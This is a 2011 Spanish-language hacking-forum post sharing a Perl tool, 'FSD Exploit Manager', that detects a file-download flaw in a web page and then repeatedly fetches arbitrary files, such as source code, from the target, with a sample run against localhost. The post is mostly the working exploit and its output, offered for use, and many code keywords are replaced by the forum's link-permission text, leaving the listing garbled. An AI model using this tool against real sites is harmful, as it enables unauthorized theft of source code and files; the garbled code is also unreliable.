comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl] FSD Exploit Manager

  • 0 Respuestas
  • 850 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Julio 03, 2011, 10:03:29 pm »
Un simple exploit que nos ayuda a explotar la vulnerabilidad Full Source Discloure de una forma
muy relajante , lo bueno de este programa es que guarda todo lo descargado en una carpeta creada
por el programa mismo.
Ademas detecta automaticamente Full Path Discloure para conocer las rutas necesarias para descargar
archivos.

Código: Perl
  1. #!usr/bin/perl
  2. #FSD Exploit Manager (C) Doddy Hackman 2011
  3.  
  4. use LWP::UserAgent;
  5. use URI::Split No tienes permisos para ver links. Registrate o Entra con tu cuenta(uri_split);
  6. use File::Basename;
  7.  
  8. my $nave = LWP::UserAgent->new;
  9. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  10. $nave->timeout(5);
  11.  
  12. $SIG{INT} = \&adios;
  13.  
  14. head();
  15. if($ARGV[0]) {
  16. ver($ARGV[0]);
  17. } else {
  18. sintax();
  19. }
  20. copyright();
  21.  
  22. sub ver {
  23.  
  24. my $page = No tienes permisos para ver links. Registrate o Entra con tu cuenta;
  25. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Target : ".$page."\n\n";
  26.  
  27. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
  28.  
  29. if ($path=~/\/(.*)$/) {
  30. my $me = $1;
  31. $code1 = toma($page.$me);
  32. if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
  33. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Full Source Discloure Detect\a\n";
  34. $code2 = toma($page."'");
  35. if ($code2=~/No such file or directory in <b>(.*)<\/b> on line/) {
  36. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Full Path Dislocure Detect : ".$1."\n";
  37. }
  38. installer();
  39. while(1) {
  40. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\nurl>";
  41. $SIG{INT} = \&adios;
  42. No tienes permisos para ver links. Registrate o Entra con tu cuenta(my $url = <stdin>);
  43. if (download($page.$url,"fsdlogs/".basename($url))) {
  44. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] File Downloaded\n";
  45. No tienes permisos para ver links. Registrate o Entra con tu cuenta("start fsdlogs/".basename($url));
  46. }
  47. }
  48. } else {
  49. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[-] Web not vulnerable\n\n";
  50. }
  51. }
  52. }
  53.  
  54. sub adios {
  55. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] Good Bye\n";
  56. copyright();
  57. }
  58.  
  59. sub head {
  60. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n-- == FSD Exploit Manager == --\n\n";
  61. }
  62.  
  63. sub copyright {
  64. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n-- == (C) Doddy Hackman 2011 == --\n\n";
  65. No tienes permisos para ver links. Registrate o Entra con tu cuenta(1);
  66. }
  67.  
  68. sub sintax {
  69. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Sintax : $0 <page>\n";
  70. }
  71.  
  72. sub toma {
  73. No tienes permisos para ver links. Registrate o Entra con tu cuenta $nave->get($_[0])->content;
  74. }
  75.  
  76. sub download {
  77. if ($nave->mirror($_[0],$_[1])) {
  78. if (-f $_[1]) {
  79. No tienes permisos para ver links. Registrate o Entra con tu cuenta true;
  80. }}}
  81.  
  82. sub installer {
  83. unless (-d "fsdlogs/") {
  84. No tienes permisos para ver links. Registrate o Entra con tu cuenta("fsdlogs/","777");
  85. }}
  86.  
  87. # ¿ The End ?
  88.  


Un ejemplo de uso

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
C:\Documents and Settings\Administrador\Escritorio\Todo\Warfactory II\proyectos\
FSD Exploit Manager>fsd.pl http://localhost/down.php?down=


-- == FSD Exploit Manager == --


[+] Target : http://localhost/down.php?down=

[+] Full Source Discloure Detect

[+] Full Path Dislocure Detect : C:\xampp\htdocs\down.php


url>c:/aca.txt


[+] File Downloaded


url>c:/aca.txt


[+] File Downloaded


[+] Good Bye


-- == (C) Doddy Hackman 2011 == --


« Última modificación: Julio 17, 2011, 03:41:27 am por Sthefano02 »

 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 3164
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1477
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Perl] Half Life Servers List 0.1

Iniciado por BigBear

Respuestas: 0
Vistas: 1105
Último mensaje Noviembre 12, 2012, 07:31:50 pm
por BigBear
[Perl] Search in google for scan SQLI

Iniciado por BigBear

Respuestas: 0
Vistas: 1253
Último mensaje Julio 03, 2011, 09:49:49 pm
por BigBear
[Uniscan] Scanner de vulnerabilidades WEB hecho en Perl

Iniciado por tar3kw0rm3d

Respuestas: 0
Vistas: 1605
Último mensaje Junio 02, 2013, 08:01:28 pm
por tar3kw0rm3d